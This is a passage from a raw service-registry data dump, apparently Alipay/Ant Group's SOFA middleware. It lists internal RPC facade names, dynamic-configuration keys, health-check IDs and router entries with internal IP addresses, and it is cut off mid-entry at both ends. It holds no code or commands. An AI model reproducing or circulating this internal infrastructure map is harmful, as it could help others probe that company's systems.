FAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_DISCOUNT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finance.goldetfprod.common.service.facade.gold.AssetInfoQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.tac.TacAliyunInspFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BAOXIAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tscenter.common.service.facade.Edge3PublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbalgocenter.common.service.facade.glcxyz.menurecog.MenuRecognizerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yutu.SpmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.vouchercore.facade.api.voucher.VoucherQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditbatch.service.MYBKAgreementBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.prodtrans.UnifiedLimitCheckFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:implementNumberValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.datadiagnosis.common.facade.smoke.api.SmokeApi:1.0:dpdatadiagnosis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.specialbusiness.api.query.AcctransManulFreezeLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.AccountMaintenanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mayibank.bkprocecore.common.service.spi.oyz.publish.quality.NDOQualityLinkageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcguabus_fcguabusProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.237.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csguide.service.facade.api.PageTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.250.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_O_LINKE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobile.mdevsupport.facade.alarmanalysis.AnalysisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.25.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.compmng.service.facade.hf.service.HfInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ISDSP#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.247.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kabaocore.service.facade.CardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.signup.rpc.facade.RecruitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bizops.facade.ServerlessTaskAutoStampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.service.facade.alipaypcard.api.AlipayPCardtransTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:creditexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gfsettle.facade.api.InterTradeOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:forexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IMOBILEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerChemistInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng_authoritysAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:mitemcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequery.common.service.facade.TradePaymentOrderQueryFacade:1.0:tradequeryprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.service.drm.FPASwitchConfigDrm.migrateBlackUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.service.cert.facade.CertProductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.charge:name=com.alipay.zcache.tbase.revtransTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmClientMonitorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.ExerciseModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.prodmng.api.FundItemPreviewQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.test.facade.DataTestQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdataaccess.common.service.facade.api.rate.ClientRateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:fundStateResolver@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessService:1.0:uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.CashingProductOffSaleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@frdataaccess#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.psslip.facade.api.SlipQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.marketing.facade.promotion.service.MarketingSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.51.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.18.116.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileiclib.common.service.facade.product.VerifyProductRecommendFacade:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.meta.MetaWatermarkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxSourceQuoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.mng.FinBatchManualService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_OPEN_SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securitydata.common.sdlib.uctriskcluster.UctRiskClusterRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.engine.validation.manager.DecisionValidationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.notice.user.NoticeTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.MobileBiometricQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.97.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.aciamcore.common.service.facade.app.AppRoleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.domain.MrmBuDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.SystemConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.GateWayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.product.contract.ProductContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:poscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antemc.service.facade.EmcChangeOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securityjs:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:certify_orgBankCardProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebDefaultConfirmAndProfitDateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.FxClearingMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.connect.mobile.codec.front.facade.api.cpm.AcCpmQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.choosedschedule.PlannedScheduleQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.asset.statistics.service.impl.PortfolioProfitQueryServiceImpl.tairExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scenario-deployment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.permlimit.nearshare.facade.CalcModelQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketAwardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.interact.interactUserNotifyBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.masterdata.uniform.whitelist.drm.resource.values,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.antfinancial.antchain.cloud.endpoint.facade.AlipayAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zcbmarketcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.batchfund.common.service.facade.alloc.api.AllocRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsDwVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.common.service.facade.changecode.MngChangeCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundTradeOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.dataLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:batchfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:ipromofront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icdpcore.common.service.facade.api.AdSpaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.facade.api.PrivilegeAuthFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.relation.RelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.application.v2.ApplicationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.CampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.content.mng.ContentAggMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finriskeventseek@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.cryptprod.common.service.facade.HsmPinCryptoFacade:1.0:fccryptprod_boss@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.core.domain.service.service.GroupMemberDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.menu.MenuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:girisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfundprotocol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.AppBaseConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.243.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omoaidbase.common.service.facade.videocall.VideoCallPageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.amspm.ardd.common.support.api.BizIdentityDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.WTTicketFacade:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskbiz.common.service.facade.api.PayRiskDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.core.service.schedule.manage.ScheduleRuleManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.LogicInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.common.service.facade.confreg.ConfregClientFacade:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.235.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fininsightcore.common.service.facade.userinsight.api.UserAnnaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:tallyprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.category.FrontCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.displaygoods.DisplayGoodsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tscenterdata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.topic.NearTopicManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ExterfaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insopenprod.common.service.facade.api.CommandServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.task.NotifySwitchLogOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.user.UserMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_SECCLIPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointprod.common.util.resource.ShadowTestConfigResource.chargeShadowTestSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_B_DEPOSIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.150.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.infosec.content.service.facade.RiskContentSceneConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infostudio.facade.mng.ability.AbilityCheckDataMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointActivityDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtMfdBizTypeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.AuthManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@linkw#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.riskmng:name=com.alipay.riskmng.biz.drm.TaskFacadeResource.query4ISU,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clearingcenter.facade.api.NettingClearingRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.integration.mobilepep.EventMsgFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.BrandWallManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferQueryRZoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.fixedRateCloudProdCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financeprod.cifproxy.facade.UserInfoQueryProxyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcredittrans.facade.scancode.api.ScctransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransBatchPayProdTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.IndicatorPreCalculateResource.indicatorCalLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlecore.service.facade.SettleMessageSender:1.0:yzt@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.UserNoticeService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.biz.service.msgbroker.EventHandler:1.0:TriggerRevisitHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.OrganizationFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.amspm.fin.meta.config.drm.ModelMetaConfigDrmResource.modelMetaConfigInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ioteds.metadata.repo.api.MetadataPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.RuleAnalyzeDRMStrategy.needIgnoreTestRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exchangecore.common.service.facade.ExRemitInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.merchant.MedicalMerchantInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.142.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.apshopcenter.common.service.facade.PromotionOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.ExpNoticeInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rccenter.common.service.facade.RccenterLegalDecisionBusValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.commonconfig.CommonConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.budget.SettleTerminateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_DEVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_G_SETTLEGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mpa.common.service.MpaSyncExecuteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngAppAuthManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArInvoiceRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.config.PcreditGroupProfileSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.fluxconf.biz.shared.DataCacheRefreshFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappcomment.MiniAppCommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:security_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.MaterialSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.product.ProdQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchmobile.common.service.facade.mmcard.MrchMemberPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.campaign.CampaignSendQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.178.207#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbprizeprod.common.service.facade.CampQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.subject.SubjectConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.visibletag.AccountCheckVisibleTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplatform.biz.api.dashboard.DashboardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitytradecore.common.service.facade.api.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.databoard.DataBoardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerforum.service.Post:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-mrchportalcore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ecsign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openeco.coc.ecomodel.api.merchant.MerchantAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ismonitor.core.service.censor.sheet.CensorSheetService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.security.dresource.